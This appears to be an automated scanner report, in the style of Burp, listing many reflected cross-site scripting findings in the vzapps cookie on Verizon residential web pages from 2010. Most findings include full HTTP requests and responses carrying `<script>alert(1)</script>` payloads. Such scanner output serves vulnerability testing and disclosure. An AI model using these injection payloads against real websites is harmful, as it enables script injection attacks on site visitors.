Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXb3a42'><script>alert(1)</script>fbf87ca090d; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 184ee<script>alert(1)</script>f56d57ce32c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX184ee<script>alert(1)</script>f56d57ce32c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 18907'><script>alert(1)</script>cc88d71fd80 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX18907'><script>alert(1)</script>cc88d71fd80; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 9ef9c<script>alert(1)</script>ac3a5bc187c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX9ef9c<script>alert(1)</script>ac3a5bc187c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8f58f'><script>alert(1)</script>45f51d22094 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSTV/Overview.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX8f58f'><script>alert(1)</script>45f51d22094; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 8e5cb<script>alert(1)</script>29788bcdb3c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSTV/Overview.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX8e5cb<script>alert(1)</script>29788bcdb3c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 323cd'><script>alert(1)</script>db7eded9442 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSTV/Plans/Plans.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX323cd'><script>alert(1)</script>db7eded9442; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload a1439<script>alert(1)</script>7afc59f4fcb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSTV/Plans/Plans.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXa1439<script>alert(1)</script>7afc59f4fcb; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 3eca3<script>alert(1)</script>d981b509d0a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX3eca3<script>alert(1)</script>d981b509d0a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6db83'><script>alert(1)</script>29aa0ccd992 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX6db83'><script>alert(1)</script>29aa0ccd992; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload f4176<script>alert(1)</script>334615d8942 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXf4176<script>alert(1)</script>334615d8942; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 71893 Expires: Sat, 20 Nov 2010 00:13:07 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:13:07 GMT Connection: close Set-Cookie: ContextInfo_State=TXf4176<script>alert(1)</script>334615d8942; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4cfc4'><script>alert(1)</script>fd78a1ef0ca was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX4cfc4'><script>alert(1)</script>fd78a1ef0ca; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 70302 Expires: Sat, 20 Nov 2010 00:12:38 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:12:38 GMT Connection: close Set-Cookie: ContextInfo_State=TX4cfc4'><script>alert(1)</script>fd78a1ef0ca; path=/
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5b82d'><script>alert(1)</script>f8ced5a7994 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 4abd8<script>alert(1)</script>d0d4bb3410c was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8fff9'><script>alert(1)</script>5f319f2b2d3 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX8fff9'><script>alert(1)</script>5f319f2b2d3; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 71904 Expires: Sat, 20 Nov 2010 00:10:12 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:10:12 GMT Connection: close Set-Cookie: ContextInfo_State=TX8fff9'><script>alert(1)</script>5f319f2b2d3; path=/
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 306e5<script>alert(1)</script>de57f988df3 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX306e5<script>alert(1)</script>de57f988df3; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 71900 Expires: Sat, 20 Nov 2010 00:10:27 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:10:27 GMT Connection: close Set-Cookie: ContextInfo_State=TX306e5<script>alert(1)</script>de57f988df3; path=/
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 65b09'><script>alert(1)</script>cb2218c31f2 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 64444 Expires: Sat, 20 Nov 2010 03:13:59 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 03:13:59 GMT Connection: close Set-Cookie: ContextInfo_State=TX65b09'><script>alert(1)</script>cb2218c31f2; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet | Check Availability </title><meta name="keywords" content="how to get verizon high speed internet, order verizon high ...[SNIP]... <input type='hidden' id='locationInfo' value='TX65B09'><SCRIPT>ALERT(1)</SCRIPT>CB2218C31F2 ' /> ...[SNIP]...
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bd1d1'><script>alert(1)</script>6e680d13017 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 62999 Expires: Sat, 20 Nov 2010 03:14:18 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 03:14:18 GMT Connection: close Set-Cookie: ContextInfo_State=TXbd1d1'><script>alert(1)</script>6e680d13017; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet | Check Availability </title><meta name="keywords" content="how to get verizon high speed internet, order verizon high ...[SNIP]... <input type='hidden' id='locationInfo' value='TXBD1D1'><SCRIPT>ALERT(1)</SCRIPT>6E680D13017 ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cdf59'><script>alert(1)</script>ece11e87003 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXcdf59'><script>alert(1)</script>ece11e87003; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 64487 Expires: Sat, 20 Nov 2010 00:09:15 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:09:15 GMT Connection: close Set-Cookie: ContextInfo_State=TXcdf59'><script>alert(1)</script>ece11e87003; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet | Check Availability </title><meta name="keywords" content="how to get verizon high speed internet, order verizon high ...[SNIP]... <input type='hidden' id='locationInfo' value='TXCDF59'><SCRIPT>ALERT(1)</SCRIPT>ECE11E87003 ' /> ...[SNIP]...
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload c9450<script>alert(1)</script>4aca6b8b3b4 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 92711 Expires: Sat, 20 Nov 2010 03:15:07 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 03:15:07 GMT Connection: close Set-Cookie: ContextInfo_State=TXc9450<script>alert(1)</script>4aca6b8b3b4; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet: Features & Services </title><meta name="keywords" content="verizon high speed internet features, verizon features ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TXC9450<SCRIPT>ALERT(1)</SCRIPT>4ACA6B8B3B4 </DIV> ...[SNIP]...
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ab748'><script>alert(1)</script>80592d937c4 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 92716 Expires: Sat, 20 Nov 2010 03:14:53 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 03:14:53 GMT Connection: close Set-Cookie: ContextInfo_State=TXab748'><script>alert(1)</script>80592d937c4; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet: Features & Services </title><meta name="keywords" content="verizon high speed internet features, verizon features ...[SNIP]... <input type='hidden' id='locationInfo' value='TXAB748'><SCRIPT>ALERT(1)</SCRIPT>80592D937C4 ' /> ...[SNIP]...
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 668ed'><script>alert(1)</script>bf2d4cd51f6 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
